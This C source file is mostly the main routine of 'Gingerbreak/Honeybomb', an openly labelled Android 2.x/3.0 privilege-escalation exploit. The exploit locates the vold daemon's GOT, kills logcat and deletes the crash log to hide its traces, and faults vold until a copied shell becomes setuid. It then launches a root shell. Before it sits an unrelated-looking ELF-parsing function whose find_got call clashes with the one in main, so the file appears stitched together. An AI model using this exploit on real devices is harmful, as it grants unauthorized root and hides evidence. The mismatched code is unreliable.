int hook_pltgot(char *exename, unsigned long offset)
{
int fd;
int ret = -1;
Elf *elf;
GElf_Ehdr ehdr;
Elf_Scn *sec;
GElf_Shdr shdr;
Elf_Data *data;
size_t shstr_idx;
size_t i;
bool found = false;
pr_dbg2("opening executable image: %s\n", exename);
fd = open(exename, O_RDONLY);
if (fd < 0)
return -1;
elf_version(EV_CURRENT);
elf = elf_begin(fd, ELF_C_READ_MMAP, NULL);
if (gelf_getehdr(elf, &ehdr) == NULL)
goto elf_error;
if (elf_getshdrstrndx(elf, &shstr_idx) < 0)
goto elf_error;
for (i = 0; i < ehdr.e_phnum; i++) {
GElf_Phdr phdr;
if (gelf_getphdr(elf, i, &phdr) == NULL)
goto elf_error;
if (phdr.p_type == PT_LOAD && !found) {
offset -= phdr.p_vaddr;
found = true;
}
if (phdr.p_type != PT_DYNAMIC)
continue;
sec = gelf_offscn(elf, phdr.p_offset);
if (!sec || gelf_getshdr(sec, &shdr) == NULL)
continue;
data = elf_getdata(sec, NULL);
if (data == NULL)
goto elf_error;
if (find_got(data, shdr.sh_size / shdr.sh_entsize, offset) < 0)
goto elf_error;
}
ret = 0;
out:
elf_end(elf);
close(fd);
return ret;
elf_error:
pr_dbg("%s\n", elf_errmsg(elf_errno()));
goto out;
}
int main(int argc, char **argv, char **env)
{
uint32_t i = 0, j = 0, idx = 0;
char *ash[] = {sh, 0};
struct stat st;
char build_id[256], version_release[256];
if (geteuid() == 0 && getuid() == 0 && strstr(argv[0], "boomsh"))
do_root();
printf("\n[**] Gingerbreak/Honeybomb -- android 2.[2,3], 3.0 softbreak\n");
printf("[**] (C) 2010-2011 The Android Exploid Crew. All rights reserved.\n");
printf("[**] Kudos to jenzi, the #brownpants-party, the Open Source folks,\n");
printf("[**] Zynamics for ARM skills and Onkel Budi\n\n");
printf("[**] donate to [email protected] if you like\n[**] Exploit may take a while!\n\n");
if (copy("/proc/self/exe", bsh) < 0 || copy("/system/bin/sh", sh) < 0)
die("[-] Cannot copy boomsh.");
chmod(bsh, 0711);
printf("[+] start __system_property_get(\"ro.build.id\", build_id)\n");
__system_property_get("ro.build.id", build_id);
printf("[+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+]end __system_property_get(\"ro.build.id\", build_id)\n");
__system_property_get("ro.build.version.release", version_release);
printf("[+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] end __system_property_get(\"ro.build.version.release\", version_release)\n");
if (strstr(build_id, "HONEY") || strstr(build_id, "Honey") || strstr(build_id, "honey") ||
strstr(version_release, "comb")) {
printf("[+] Detected honeycomb! Starting honeybomb mode (scale=10).\n");
scale = 10;
honeycomb = 1;
} else if (strstr(build_id, "FR") || strstr(build_id, "Fr") || strstr(build_id, "fr")) {
printf("[+] Detected Froyo!\n");
froyo = 1;
} else
printf("[+] Plain Gingerbread mode!\n");
find_vold(&vold);
find_got("/system/bin/vold");
find_device();
printf("[*] vold: %04d GOT start: 0x%08x GOT end: 0x%08x\n", vold.pid, vold.got_start,
vold.got_end);
printf("[*] start find_index\n");
idx = find_index();
printf("[*] idx: %04d GOT idx\n", idx);
kill(logcat_pid, SIGKILL);
unlink(crashlog);
printf("[*] _________________end unlink\n");
for (i = idx; j++ < (vold.got_end - vold.got_start); --i) {
if (do_fault(i, 0) < 0) {
++i; --j;
printf("[-] sendmsg() failed?\n");
continue;
}
printf("[*] vold: %04d idx: %08d\n", vold.pid, -i); fflush(stdout);
stat(sh, &st);
if ((st.st_mode & 04000) == 04000) {
printf("\n\n[!] dance forever my only one\n");
break;
}
}
/* Last try, sometimes vold cant handle 2 receives in the order
* we like by do_fault()
*/
if ((st.st_mode & 04000) != 04000) {
last_try(); last_try();
stat(sh, &st);
if ((st.st_mode & 04000) == 04000) {
printf("\n[+] You are in luck! Last try succeeded!\n");
} else {
printf("\n[-] Bad luck. Fixed vold?\n");
exit(1);
}
}
execve(*ash, ash, env);
return 0;
}
